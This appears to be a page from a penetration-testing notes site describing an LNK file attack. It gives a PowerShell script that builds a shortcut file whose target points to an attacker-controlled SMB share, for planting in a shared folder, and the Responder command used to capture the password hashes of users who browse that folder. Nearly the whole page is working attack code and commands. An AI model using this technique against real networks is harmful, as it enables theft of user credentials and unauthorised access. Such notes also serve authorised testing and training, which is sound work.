LNK File Attacks

  • Places a malicious file in a shared folder that can lead to capturing hashes through responder

LNK File Creation
$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\IP_ADDRESS_ATTACKER\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

  • Start responder sudo Responder.py -I eth0 -dPv

  • Navigate to the share and you should receive captured hashed in responder

  • Note: Make sure SMB is turned ON in responder.conf

PreviousKerberoastingNextMimikatz

Last updated